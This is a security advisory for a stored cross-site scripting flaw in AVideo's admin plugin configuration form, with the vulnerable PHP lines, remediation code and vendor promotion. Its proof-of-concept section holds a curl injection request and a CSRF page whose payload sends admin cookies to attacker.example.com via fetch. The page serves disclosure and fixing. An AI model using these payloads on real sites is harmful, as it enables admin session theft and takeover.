CVE-2026-34396

CVE-2026-34396 is a medium-severity cross-site scripting (XSS) vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet.

Summary

The AVideo admin panel renders plugin configuration values in HTML forms without applying htmlspecialchars() or any other output encoding. The jsonToFormElements() function in admin/functions.php directly interpolates user-controlled values into textarea contents, option elements, and input attributes. An attacker who can set a plugin configuration value (either as a compromised admin or by chaining with CSRF on admin/save.json.php) can inject arbitrary JavaScript that executes whenever any administrator visits the plugin configuration page.

This vulnerability chains with AVI-046 (CSRF on save.json.php) to enable a full cross-origin stored XSS attack against the admin panel without requiring any prior authentication.

Details

The jsonToFormElements() function in admin/functions.php contains multiple unsafe output points where configuration values are rendered without escaping:

Textarea injection (line 47):

// admin/functions.php:47
$html .= "<textarea class='form-control' name='{$name}' id='{$id}'>{$valueJson->value}</textarea>";

The $valueJson->value is placed directly between textarea tags without encoding.

Select option injection (line 55):

// admin/functions.php:55
$html .= "<option value='{$key}' {$select}>{$value}</option>";

Both $key and $value are inserted without encoding, allowing attribute breakout and HTML injection.

Input type and value injection (lines 62-63):

// admin/functions.php:62-63
$html .= "<input class='form-control' type='{$valueJson->type}' value='{$valueJson->value}' name='{$name}' id='{$id}'/>";

Both type and value attributes are unescaped, enabling attribute injection.

Fallback input injection (line 75):

// admin/functions.php:75
$html .= "<input class='form-control' type='text' value='{$valueJson}' name='{$name}' id='{$id}'/>";

The raw $valueJson string is placed into the value attribute without encoding.

Configuration values are saved via admin/save.json.php, which lacks CSRF token validation.

Proof of Concept

Method 1: Direct exploitation (requires admin session)

# Store XSS payload in a plugin configuration value
# The endpoint uses pluginName and direct field names as parameters
curl -b "PHPSESSID=ADMIN_SESSION_COOKIE" \
  -X POST "https://your-avideo-instance.com/admin/save.json.php" \
  -d "pluginName=PlayerSkins&skin=x' onfocus=alert(document.cookie) autofocus='"

When any admin visits the plugin configuration page, the payload fires.

Method 2: Cross-origin chain with CSRF (no authentication required)

Create the following HTML page and trick an admin into visiting it:

<!DOCTYPE html>
<html>
<head><title>AVI-033 + AVI-046 Chain PoC</title></head>
<body>
<h1>Loading...</h1>
<form id="xss" method="POST"
      action="https://your-avideo-instance.com/admin/save.json.php">
  <input type="hidden" name="name" value="Gallery" />
  <input type="hidden" name="parameter" value="description" />
  <input type="hidden" name="value"
         value="' onfocus=fetch('https://attacker.example.com/steal?c='+document.cookie) autofocus='" />
</form>
<script>document.getElementById('xss').submit();</script>
</body>
</html>

The payload breaks out of the value attribute in the rendered input element:

<!-- Rendered HTML in admin panel -->
<input class='form-control' type='text'
       value='' onfocus=fetch('https://attacker.example.com/steal?c='+document.cookie) autofocus=''
       name='description' id='description'/>

Impact

An attacker can achieve stored cross-site scripting in the AVideo admin panel. When chained with the CSRF vulnerability on save.json.php, this requires zero authentication - the attacker only needs to lure an admin to a malicious page. Once the XSS fires in the admin context, the attacker can:

  • Steal admin session cookies and CSRF tokens

  • Create new admin accounts

  • Modify site configuration (enable file uploads, disable security features)

  • Inject persistent JavaScript into public-facing pages via site-wide settings

  • Pivot to server-side code execution via plugin upload functionality

  • CWE-79: Improper Neutralization of Input During Web Page Generation (Stored XSS)

  • Severity: High

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

CVE-2026-34396 has a CVSS score of 6.1 (Medium). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. No fixed version is listed yet, so configuration controls and monitoring matter more in the interim.

Affected versions

wwbn/avideo (<= 26.0)

Security releases

Not available

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Apply htmlspecialchars($value, ENT_QUOTES, 'UTF-8') to all user-controlled values rendered in admin/functions.php:

// admin/functions.php:47 - textarea content
$html .= "<textarea class='form-control' name='{$name}' id='{$id}'>" . htmlspecialchars($valueJson->value, ENT_QUOTES, 'UTF-8') . "</textarea>";

// admin/functions.php:55 - select option
$html .= "<option value='" . htmlspecialchars($key, ENT_QUOTES, 'UTF-8') . "' {$select}>" . htmlspecialchars($value, ENT_QUOTES, 'UTF-8') . "</option>";

// admin/functions.php:62-63 - input type and value
$html .= "<input class='form-control' type='" . htmlspecialchars($valueJson->type, ENT_QUOTES, 'UTF-8') . "' value='" . htmlspecialchars($valueJson->value, ENT_QUOTES, 'UTF-8') . "' name='{$name}' id='{$id}'/>";

// admin/functions.php:75 - fallback input
$html .= "<input class='form-control' type='text' value='" . htmlspecialchars($valueJson, ENT_QUOTES, 'UTF-8') . "' name='{$name}' id='{$id}'/>";

Found by aisafe.io

Frequently Asked Questions

  1. What is CVE-2026-34396? CVE-2026-34396 is a medium-severity cross-site scripting (XSS) vulnerability in wwbn/avideo (composer), affecting versions <= 26.0. No fixed version is listed yet. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. How severe is CVE-2026-34396? CVE-2026-34396 has a CVSS score of 6.1 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of wwbn/avideo are affected by CVE-2026-34396? wwbn/avideo (composer) versions <= 26.0 is affected.
  4. Is there a fix for CVE-2026-34396? No fixed version is listed for CVE-2026-34396 yet. Monitor the advisory for updates and apply mitigations in the interim.
  5. Is CVE-2026-34396 exploitable, and should I be worried? Whether CVE-2026-34396 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2026-34396 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2026-34396? No fixed version is listed yet. In the interim: Validate and encode untrusted input before rendering it as HTML. Applying a Content Security Policy reduces the impact if encoding is bypassed.

Other vulnerabilities in wwbn/avideo

CVE-2026-33731CVE-2026-33692CVE-2026-33684CVE-2026-54458CVE-2026-50183

Stop the waste.
Protect your environment with Kodem.